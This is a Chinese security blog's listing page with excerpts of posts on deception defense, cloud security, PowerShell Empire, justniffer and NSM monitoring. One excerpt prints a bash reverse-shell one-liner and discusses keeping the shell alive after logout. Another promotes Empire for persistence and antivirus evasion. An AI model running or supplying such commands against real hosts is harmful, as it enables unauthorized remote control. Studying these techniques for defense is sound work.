当前位置: 首页 > 网络安全
  • 谈谈欺骗防御技术

    一、什么是欺骗防御 近年来,网络安全形势日益严峻,信息泄露事件更是频繁发生。在这场攻与防的虚拟博弈空间里,攻击者的新型攻击技术已经远远超出了当前的主流防御检测方法。加以0Day攻击、高级持续性(APT)攻击以及基于人性弱点的漏洞攻击等,使得传统的网络安全产品(如WAF、IDS、IPS等)根本无法提供及时检测并阻断威 ...

    作者:s0nnet | 发布:2018-09-27 | 分类:安全产品, 网络安全 | 围观:9,334 次 | 标签: | 评论: 抢沙发
  • 云计算安全到底是什么?

    本文系笔者的老板云舒在公司内部的一次关于《云计算平台安全科普》的技术分享。结合笔者自己对云计算网络安全的的理解以及查阅相关资料的补充,现简单概括并梳理成文。限于云安全范围较广,本文仅讨论云平台底层技术的网络安全问题。更多其他方面的可以继续关注笔者的后期文章。  一、两种最基本的云计算 1. 弹性 ...

    作者:s0nnet | 发布:2018-09-23 | 分类:网络安全 | 围观:7,428 次 | 标签: | 评论: 抢沙发
  • powershell学习资源分享

    这段时间看了一个Windows下权限维持的开源工具组件Empire,采用powershell来对目标主机进行操作,由于是powershell,所有基本都是免杀。关于Empire,有兴趣的同学可以研究下,下面是相关学习资料: 作者博客: http://www.powershellempire.com/ GitHub链接:https://github.com/PowerShellEmpire Empire:PowerShell后 ...

    作者:s0nnet | 发布:2016-08-27 | 分类:代码艺术, 安全工具, 网络安全 | 围观:6,324 次 | 标签:, | 评论: 抢沙发
  • setsid实现后台运行

    0x00 经典姿势 下面这个在Linux下反弹shell的经典姿势相信大家一定不会陌生: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 但是,这样是有一个小问题的,就是当你在target主机上运行上面这句shell脚本时,它是一直在等待挂着的,如果退出的话,反弹出来的shell也会跟着断掉,这就不好玩了。   0x01 关 ...

    作者:s0nnet | 发布:2016-06-25 | 分类:C/C++, Kali Linux, Linux系统, 代码艺术, 网络安全 | 围观:8,948 次 | 标签:, | 评论: 抢沙发
  • justniffer实战应用

    在上一篇blog《justniffer使用指南》中讲了justniffer的基本使用,本篇blog将分享一下justniffer在生产环境中的具体使用。下面就实际环境中的使用举一些例子加以说明。 0x01 输出日志格式 首先要讲到的就是justniffer的日志输出日志格式,因为这个功能太实用而且强大了。 使用参数:-l or –log-format=<forma ...

    作者:s0nnet | 发布:2016-05-26 | 分类:Kali Linux, TCP/IP, 安全工具, 安全资讯, 网络安全 | 围观:6,932 次 | 标签:, | 评论: 抢沙发
  • justniffer使用指南

    前言 本篇文章基本翻译自justniffer官方文档,因为笔者觉得自己能力有限,自己写这份指南将有损justniffer的强(bi)猛(ge)。同时,这也是NSM兵器谱中常用之一,笔者将会在随后一系列文章中分享这些利器的运筹之道,各位稍安勿躁。 0x00 justniffer介绍 justniffer是一款全面的网络协议分析利器,它可以捕获网络传输 ...

    作者:s0nnet | 发布:2016-05-19 | 分类:Kali Linux, TCP/IP, 安全工具, 安全资讯, 网络安全 | 围观:9,785 次 | 标签:, | 评论: 抢沙发
  • NSM防御模型-基本方法

    本文接着上一篇博文《深入理解NSM–基本概念》 ,在最后说到以漏洞为中心的网络安全防御终将是失败的。在建立现代NSM网络安全监控模型中,将采用Bejtlich的以威胁为中心的防御思想。 以漏洞为中心 vs 以威胁为中心 这里引用《Applied Network Security monitoring》一书中的经典解释: 考虑在一个曲棍球比赛中,你的大门 ...

    作者:s0nnet | 发布:2016-05-13 | 分类:GNU/Linux, 安全工具, 安全资讯, 网络安全 | 围观:6,415 次 | 标签:, | 评论: 抢沙发
  • NSM防御模型-基本概念

    信息安全领域 随着当今互联网的不断发展,数据的安全重视程度也在不断升温,可谓“数据驱动安全”。信息安全现在已经被划分为不多不同的焦点领域。在《DoD 8500.2》中对整个计算机网络的防御分为了几个域: 保护:该领域主要聚焦对系统的安全加固,以防止事故发生时的漏洞利用与入侵成功。涉及到的代表性内容包括:漏洞评 ...

    作者:s0nnet | 发布:2016-05-10 | 分类:GNU/Linux, 安全工具, 安全资讯, 网络安全 | 围观:6,747 次 | 标签:, | 评论: 抢沙发